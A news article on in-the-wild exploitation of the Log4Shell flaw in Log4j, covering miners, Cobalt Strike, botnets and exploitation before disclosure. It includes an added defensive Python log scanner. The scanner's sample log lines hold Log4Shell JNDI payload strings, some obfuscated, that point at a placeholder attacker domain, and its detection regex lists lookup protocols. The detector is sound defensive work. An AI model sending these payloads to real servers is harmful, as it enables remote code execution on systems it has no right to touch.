Hackers are vigorously attacking servers affected by the « Log4Shell » vulnerability recently identified in Log4j. They aim to install cryptocurrency miners, deploy Cobalt Strike and enrol the devices in a « botnet ». Telemetry shows the flaw was being exploited nine days before it was publicly disclosed on December 9.
The security company Netlab commented on the case. Similar threats, such as Mirai and Muhstik (Tsunami), target vulnerable systems, it says. Indeed, Muhstik had exploited a critical security flaw in Atlassian Confluence in early September. Those were DDoS (distributed denial of service) attacks intended to render infected systems unusable.
A threat since early December
The Redmond-based tech giant says it has detected a plethora of malicious activity, including the installation of Cobalt Strike for credential theft, the deployment of cryptocurrency miners and the exfiltration of data from compromised machines.
“The first Log4j exploitation report dates from December 1 at 04:36 UTC.”
Matthew Prince, CEO of Cloudflare
This suggests that the flaw was already being exploited at least nine days before its revelation to the general public. According to the Cisco Talos Intelligence Group report, there was already hacker activity from December 2.
How is the Log4Shell flaw exploited?
Most of the attacks observed by Microsoft, at present, are attempts to probe for vulnerable systems. However, once an attacker controls an application, there are a myriad of goals that can be achieved.
Tracked as CVE-2021-44228 (CVSS score: 10.0), the flaw allows remote code execution in Log4j. All the hacker has to do is send strings containing the malicious lookup, which are then logged by Log4j version 2.0 or later.
The propagation is all the easier since the Apache library, which is open source and Java-based, is widely used in enterprises to record events and messages generated by applications. This allows hackers to have code loaded from a remote domain onto a sensitive server and take control of it. Once in control, they are capable of causing the worst havoc.
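Because the attack string has to pass through a log line to work, one of the simplest defensive measures is to scan existing logs for the JNDI lookup pattern. The detector below is an added example written for this article, not code from the page or from any vendor named in it. It runs over a handful of constructed Apache-style access log lines (the IP addresses and the domain malicious.example are placeholders, not real indicators), collapses the common lookup tricks used to split the word "jndi" across several nested lookups, and reports which lines carry a lookup and which protocol they point at.

```python
"""Scan log lines for Log4Shell-style JNDI lookups (added example, defensive use)."""
import re

# Constructed sample log lines; addresses and malicious.example are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${jndi:ldap://malicious.example/a}"',
    '198.51.100.2 - - [09/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://malicious.example/x}"',
    '198.51.100.9 - - [09/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://malicious.example/z}"',
    '10.0.0.6 - - [09/Dec/2021:12:00:05 +0000] "GET /health HTTP/1.1" 200 16 "-" "${java:version}"',
]

# ${lower:x} / ${upper:x} resolve to the single character x once Log4j evaluates them.
_SIMPLE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}", re.IGNORECASE)
# ${name:-x} (including the degenerate ${::-x}) resolves to the default value x.
_DEFAULT_LOOKUP = re.compile(r"\$\{\s*[^${}]*?:-([^${}]*?)\}")
# What remains after normalisation: a JNDI lookup naming a remote protocol.
_JNDI = re.compile(r"jndi:\s*(ldaps|ldap|rmi|dns|iiop|corba|nis|nds|http)")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested character lookups so split-up 'jndi' tokens become visible.

    The loop is bounded so a pathological input cannot keep us busy forever.
    """
    previous = None
    rounds = 0
    while previous != text and rounds < max_rounds:
        previous = text
        text = _SIMPLE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        rounds += 1
    return text.lower()


def scan_lines(lines):
    """Return one finding per log line that contains a JNDI lookup.

    Each finding records the 1-based line number, the protocol the lookup
    points at, and the normalised text that triggered the match.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        if "${" not in line:            # cheap pre-filter: no lookup syntax at all
            continue
        normalized = normalize(line)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line": number,
                "protocol": match.group(1),
                "normalized": normalized,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(f"line {finding['line']}: jndi lookup via {finding['protocol']}")
```

Line 5 contains a `${java:version}` lookup but no JNDI reference, so it is not reported; in practice it would still be worth a second look, since any unexpected lookup syntax in client-supplied data is a sign that someone is probing the logging layer.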
There is no specific target for this vulnerability. Hackers take a « spray-and-pray » approach to wreak havoc. Incidents like these illustrate how a single flaw, embedded in many software packages, can cause a chain reaction. Always remember it: malware and other computer attacks start with a single line of text.
Source From: Fredzone